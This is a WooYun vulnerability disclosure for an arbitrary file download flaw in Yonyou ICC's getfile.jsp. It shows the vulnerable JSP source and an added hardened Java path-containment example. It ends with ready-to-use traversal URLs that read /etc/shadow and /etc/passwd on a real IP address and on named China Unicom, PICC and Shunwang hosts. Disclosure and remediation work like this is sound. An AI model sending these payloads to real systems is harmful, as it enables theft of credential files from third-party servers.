WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-01-11: Details sent to the vendor; awaiting vendor handling
2015-01-12: Vendor confirmed; details visible to the vendor only
2015-01-15: Details opened to third-party security partners
2015-03-08: Details opened to core white hats and relevant domain experts
2015-03-18: Details opened to regular white hats
2015-03-28: Details opened to intern white hats
2015-04-13: Details made public
Arbitrary file download
The Yonyou ICC customer-service system has an arbitrary file download vulnerability. The vulnerable file is common/getfile.jsp; its source is as follows (the user-supplied `p` value is only trimmed at the last `/`, while backslashes are converted to `/` afterwards, so a backslash-based `..\` sequence reaches the filesystem intact):

```jsp
<%@ page contentType="text/html;charset=UTF-8" %>
<%@ page import="java.io.*,com.ufida.icc.util.*,java.util.*" %>
<%
String fullPath = "";
String f = "";
f = request.getParameter("p");
if (CommonUtil.validateParam(f)) {
    f = "";
}
f = CommonUtil.filtParam(f);
if (f == null || f.equals("")) {
    out.print("请传入文件名。<br>");
    return;
}
// Keeps only the text after the last '/'; backslashes are not considered here.
f = f.substring(f.lastIndexOf("/") + 1);
String extName = f.substring(f.lastIndexOf(".") + 1);
if (extName.equals(f)) {
    out.print("请传入正确的文件名,带后缀<br>");
    return;
}
String basePath = null;
String baseUrl = null;
baseUrl = SystemProperties.instance().webBaseUrl;
basePath = SystemProperties.instance().webUploadPath;
fullPath = basePath + f;
// Backslashes become '/' only now, after the '/'-based trimming above,
// so "..\..\etc\shadow" turns into a working "../../etc/shadow" path.
fullPath = fullPath.replace("\\", "/");
String fullPathFileName = fullPath.substring(fullPath.lastIndexOf("/") + 1);
String fullPathFile = fullPath.replace(fullPathFileName, "");
File fileLoad = new File(fullPathFile, fullPathFileName);
if (fileLoad.exists()) {
    OutputStream outp = null;
    FileInputStream in = null;
    String typeName = "application/octet-stream";
    try {
        outp = response.getOutputStream();
        byte b[] = new byte[1024];
        response.setHeader("Content-disposition", "attachment;filename=" + fullPathFileName);
        response.setContentType(typeName);
        long fileLength = fileLoad.length();
        String length = String.valueOf(fileLength);
        response.setHeader("Content-Length", length);
        in = new FileInputStream(fileLoad);
        int n = 0;
        // Streams whatever file the resolved path points at, with no containment check.
        while ((n = in.read(b)) != -1) {
            outp.write(b, 0, n);
        }
        outp.flush();
    } catch (Exception e) {
        out.println("下载失败:" + e.getMessage());
    } finally {
        if (in != null) {
            in.close();
            in = null;
        }
        if (outp != null) {
            outp.close();
            outp = null;
            out.clear();
            out = pageContext.pushBody();
        }
    }
} else {
    out.print("文件" + fullPathFileName + "不存在。<br>");
}
%>
```
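The following is an added example, not code from Yonyou or from the original report, showing why the string trimming above is insufficient and what a containment check looks like. `legacyFilter` reproduces the page's two string operations; `resolveInside` is the hardened replacement. The class name, the temporary upload directory and the file `report.pdf` are constructed for the demonstration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

/**
 * Added example (not Yonyou ICC code). Resolves a user-supplied file name
 * against the upload directory and refuses anything that escapes it, by
 * checking the canonical path rather than filtering characters.
 */
public class SafeDownload {

    /** Reproduces getfile.jsp: keep text after the last '/', then turn '\' into '/'. */
    static String legacyFilter(String p) {
        String f = p.substring(p.lastIndexOf("/") + 1);
        return f.replace("\\", "/");
    }

    /**
     * Returns the real path of the requested file inside baseDir. Throws
     * IllegalArgumentException for empty names, any path separator, "." / "..",
     * or a resolved path (including through symlinks) outside baseDir.
     * NoSuchFileException propagates when the file does not exist (map to 404).
     */
    static Path resolveInside(Path baseDir, String requested) throws IOException {
        if (requested == null || requested.isEmpty()) {
            throw new IllegalArgumentException("empty file name");
        }
        // Reject both separator styles up front; the page's code only handled '/'.
        if (requested.indexOf('/') >= 0 || requested.indexOf('\\') >= 0
                || requested.equals(".") || requested.equals("..")) {
            throw new IllegalArgumentException("path separators are not allowed");
        }
        Path base = baseDir.toRealPath();                 // canonical upload dir
        Path target = base.resolve(requested).normalize();
        // Path.startsWith compares whole components, so "/upload2" is not inside "/upload".
        if (!target.startsWith(base)) {
            throw new IllegalArgumentException("outside upload directory");
        }
        Path real = target.toRealPath();                  // follows symlinks planted in the dir
        if (!real.startsWith(base)) {
            throw new IllegalArgumentException("symlink escapes upload directory");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: a scratch upload directory holding one legitimate file.
        Path upload = Files.createTempDirectory("icc-upload");
        Files.write(upload.resolve("report.pdf"), "sample".getBytes());

        String payload = "..\\..\\..\\..\\etc\\shadow";       // the report's sample input
        System.out.println("legacy filter keeps: " + legacyFilter(payload));
        // Prints ../../../../etc/shadow: the trimming removed nothing.

        System.out.println("allowed: " + resolveInside(upload, "report.pdf"));
        try {
            resolveInside(upload, payload);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The key design choice is that the decision is made on the resolved `Path`, not on the request string: character filters have to anticipate every encoding of a separator, whereas `toRealPath` plus a component-wise `startsWith` against the canonical base directory holds regardless of how the name was written.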
Example:
http://111.75.198.122/web/icc/chat/chat?c=1&s=1
http://111.75.198.122/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow

Other examples:
China Unicom online shopping customer service: http://help.10010.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd
China Unicom customer service: http://webservice.10010.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow
Life insurance customer service: http://im.e-picc.com.cn/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow
Wangwei game customer service: http://icc.shunwang.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow
Filtering
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-01-12 09:47
Thanks
None yet